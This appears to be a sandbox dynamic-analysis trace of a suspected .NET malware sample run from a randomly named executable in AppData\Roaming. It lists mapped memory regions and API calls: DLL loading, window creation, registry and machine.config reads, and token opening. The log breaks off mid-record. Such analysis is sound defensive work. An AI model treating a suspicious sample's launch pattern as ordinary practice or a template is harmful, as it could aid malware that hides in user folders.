Region: id = 1235 start_va = 0x46c0000 end_va = 0x46c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1236 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1237 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1238 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa31920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1239 start_va = 0x46c0000 end_va = 0x46c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 1240 start_va = 0x6f9e0000 end_va = 0x6fa26fff monitored = 0 entry_point = 0x6f9f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1241 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1242 start_va = 0x6fdf0000 end_va = 0x6fdf9fff monitored = 0 entry_point = 0x6fdf3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1243 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1244 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1245 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1246 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1247 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1248 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1249 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1250 start_va = 0x5040000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 1251 start_va = 0x5080000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1252 start_va = 0x46d0000 end_va = 0x46e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Region: id = 1253 start_va = 0x47e0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 1254 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 1255 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1256 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 1257 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1258 start_va = 0x47e0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 1259 start_va = 0x47e0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 1260 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 1261 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1262 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 1263 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1264 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 1265 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 1266 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 1267 start_va = 0x51d0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 1268 start_va = 0x51e0000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 1269 start_va = 0x5200000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1270 start_va = 0x5210000 end_va = 0x521ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 1271 start_va = 0x5220000 end_va = 0x522ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 1272 start_va = 0x5230000 end_va = 0x523ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 1273 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 1274 start_va = 0x5250000 end_va = 0x525ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 1275 start_va = 0x5260000 end_va = 0x526ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 1276 start_va = 0x5270000 end_va = 0x527ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 1277 start_va = 0x5280000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 1278 start_va = 0x5290000 end_va = 0x529ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 1279 start_va = 0x52a0000 end_va = 0x52affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 1280 start_va = 0x52b0000 end_va = 0x52bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 1281 start_va = 0x52c0000 end_va = 0x52cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 1282 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1283 start_va = 0x52e0000 end_va = 0x52effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 1284 start_va = 0x52f0000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 1285 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1286 start_va = 0x5310000 end_va = 0x531ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 1287 start_va = 0x5320000 end_va = 0x532ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 1288 start_va = 0x5330000 end_va = 0x533ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005330000" filename = "" Region: id = 1289 start_va = 0x47e0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 1290 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 1291 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1292 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 1293 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1294 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1295 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 1296 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 1297 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1298 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1299 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1300 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1301 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1302 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1303 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1304 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 1305 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 1306 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 1307 start_va = 0x51d0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 1308 start_va = 0x51e0000 end_va = 0x51effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 1309 start_va = 0x51f0000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 1310 start_va = 0x5200000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1311 start_va = 0x5210000 end_va = 0x521ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 1312 start_va = 0x5220000 end_va = 0x522ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 1313 start_va = 0x5230000 end_va = 0x523ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 1314 start_va = 0x5240000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 1315 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1413 start_va = 0x5180000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 1414 start_va = 0x51c0000 end_va = 0x52bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Thread: id = 47 os_tid = 0x9e0 [0119.695] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0119.731] RoInitialize () returned 0x1 [0119.732] RoUninitialize () returned 0x0 [0124.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19de58 | out: phkResult=0x19de58*=0x0) returned 0x2 [0124.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19eed4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0125.209] IsAppThemed () returned 0x1 [0125.213] CoTaskMemAlloc (cb=0xf0) returned 0x4f37f0 [0125.213] CreateActCtxA (pActCtx=0x19f418) returned 0x4f41fc [0125.357] CoTaskMemFree (pv=0x4f37f0) [0125.376] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc266 [0125.376] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc267 [0126.367] GetSystemMetrics (nIndex=75) returned 1 [0127.095] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0127.100] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6b4d0000 [0127.531] AdjustWindowRectEx (in: lpRect=0x19f450, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19f450) returned 1 [0127.534] GetCurrentProcess () returned 0xffffffff [0127.534] GetCurrentThread () returned 0xfffffffe [0127.534] GetCurrentProcess () returned 0xffffffff [0127.534] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f368, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f368*=0x270) returned 1 [0127.537] GetCurrentThreadId () returned 0x9e0 [0127.569] GetCurrentActCtx (in: lphActCtx=0x19f2c8 | out: lphActCtx=0x19f2c8*=0x0) returned 1 [0127.569] ActivateActCtx (in: hActCtx=0x4f41fc, lpCookie=0x19f2d8 | out: hActCtx=0x4f41fc, lpCookie=0x19f2d8) returned 1 [0127.569] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0129.350] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x72d30000 [0129.365] GetModuleHandleW (lpModuleName="user32.dll") returned 0x743d0000 [0129.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x19f18c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWÇfúKÍ/(ú7ihö\x19", lpUsedDefaultChar=0x0) returned 14 [0129.366] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcW") returned 0x73e807e0 [0129.367] GetStockObject (i=5) returned 0x1900015 [0129.373] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0129.491] CoTaskMemAlloc (cb=0x5c) returned 0x4fd380 [0129.491] RegisterClassW (lpWndClass=0x19f17c) returned 0xc260 [0129.491] CoTaskMemFree (pv=0x4fd380) [0129.492] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0129.492] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x2037c [0129.493] SetWindowLongW (hWnd=0x2037c, nIndex=-4, dwNewLong=1944586208) returned 74384830 [0129.495] GetWindowLongW (hWnd=0x2037c, nIndex=-4) returned 1944586208 [0129.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e9dc | out: phkResult=0x19e9dc*=0x28c) returned 0x0 [0129.497] RegQueryValueExW (in: hKey=0x28c, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e9fc, lpData=0x0, lpcbData=0x19e9f8*=0x0 | out: lpType=0x19e9fc*=0x0, lpData=0x0, lpcbData=0x19e9f8*=0x0) returned 0x2 [0129.497] RegQueryValueExW (in: hKey=0x28c, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e9fc, lpData=0x0, lpcbData=0x19e9f8*=0x0 | out: lpType=0x19e9fc*=0x0, lpData=0x0, lpcbData=0x19e9f8*=0x0) returned 0x2 [0129.497] RegCloseKey (hKey=0x28c) returned 0x0 [0129.501] SetWindowLongW (hWnd=0x2037c, nIndex=-4, dwNewLong=74384870) returned 1944586208 [0129.501] GetWindowLongW (hWnd=0x2037c, nIndex=-4) returned 74384870 [0129.501] GetWindowLongW (hWnd=0x2037c, nIndex=-16) returned 113311744 [0129.503] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc25f [0129.503] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x2037c, Msg=0x24, wParam=0x0, lParam=0x19ecf4) returned 0x0 [0129.503] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc261 [0129.503] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x2037c, Msg=0x81, wParam=0x0, lParam=0x19ece8) returned 0x1 [0129.504] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x2037c, Msg=0x83, wParam=0x0, lParam=0x19ecd4) returned 0x0 [0129.512] CallWindowProcW (lpPrevWndFunc=0x73e807e0, hWnd=0x2037c, Msg=0x1, wParam=0x0, lParam=0x19ece8) returned 0x0 [0129.512] GetClientRect (in: hWnd=0x2037c, lpRect=0x19ea14 | out: lpRect=0x19ea14) returned 1 [0129.512] GetWindowRect (in: hWnd=0x2037c, lpRect=0x19ea14 | out: lpRect=0x19ea14) returned 1 [0129.514] GetParent (hWnd=0x2037c) returned 0x0 [0129.514] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c8d0001) returned 1 [0129.528] GetACP () returned 0x4e4 [0130.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x294 [0130.837] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x298 [0130.954] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e5cc | out: phkResult=0x19e5cc*=0x29c) returned 0x0 [0130.954] RegQueryValueExW (in: hKey=0x29c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e5ec, lpData=0x0, lpcbData=0x19e5e8*=0x0 | out: lpType=0x19e5ec*=0x1, lpData=0x0, lpcbData=0x19e5e8*=0xe) returned 0x0 [0130.955] RegQueryValueExW (in: hKey=0x29c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e5ec, lpData=0x226943c, lpcbData=0x19e5e8*=0xe | out: lpType=0x19e5ec*=0x1, lpData="Client", lpcbData=0x19e5e8*=0xe) returned 0x0 [0130.957] RegCloseKey (hKey=0x29c) returned 0x0 [0132.519] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config", nBufferLength=0x105, lpBuffer=0x19df68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config", lpFilePart=0x0) returned 0x67 [0133.835] GetCurrentProcess () returned 0xffffffff [0133.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e2c8 | out: TokenHandle=0x19e2c8*=0x29c) returned 1 [0133.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0133.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e2c0 | out: lpFileInformation=0x19e2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0133.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0133.848] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e2c8 | out: lpFileInformation=0x19e2c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0133.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0133.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e200) returned 1 [0133.850] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2a0 [0133.850] GetFileType (hFile=0x2a0) returned 0x1 [0133.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e1fc) returned 1 [0133.850] GetFileType (hFile=0x2a0) returned 0x1 [0133.937] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x19e2bc | out: lpFileSizeHigh=0x19e2bc*=0x0) returned 0x8c8f [0133.938] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e278, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19e278*=0x1000, lpOverlapped=0x0) returned 1 [0134.171] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e128, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19e128*=0x1000, lpOverlapped=0x0) returned 1 [0134.172] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfdc, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19dfdc*=0x1000, lpOverlapped=0x0) returned 1 [0134.172] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfdc, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19dfdc*=0x1000, lpOverlapped=0x0) returned 1 [0134.173] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfdc, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19dfdc*=0x1000, lpOverlapped=0x0) returned 1 [0134.173] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df14, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19df14*=0x1000, lpOverlapped=0x0) returned 1 [0134.176] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e094, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19e094*=0x1000, lpOverlapped=0x0) returned 1 [0134.178] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfa4, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19dfa4*=0x1000, lpOverlapped=0x0) returned 1 [0134.178] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfa4, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19dfa4*=0xc8f, lpOverlapped=0x0) returned 1 [0134.178] ReadFile (in: hFile=0x2a0, lpBuffer=0x226cbcc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e064, lpOverlapped=0x0 | out: lpBuffer=0x226cbcc*, lpNumberOfBytesRead=0x19e064*=0x0, lpOverlapped=0x0) returned 1 [0134.178] CloseHandle (hObject=0x2a0) returned 1 [0134.180] GetCurrentProcess () returned 0xffffffff [0134.180] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e40c | out: TokenHandle=0x19e40c*=0x2a0) returned 1 [0134.180] GetCurrentProcess () returned 0xffffffff [0134.180] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e40c | out: TokenHandle=0x19e40c*=0x2a4) returned 1 [0134.181] GetCurrentProcess () returned 0xffffffff [0134.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e2c8 | out: TokenHandle=0x19e2c8*=0x2a8) returned 1 [0134.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e2c0 | out: lpFileInformation=0x19e2c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, 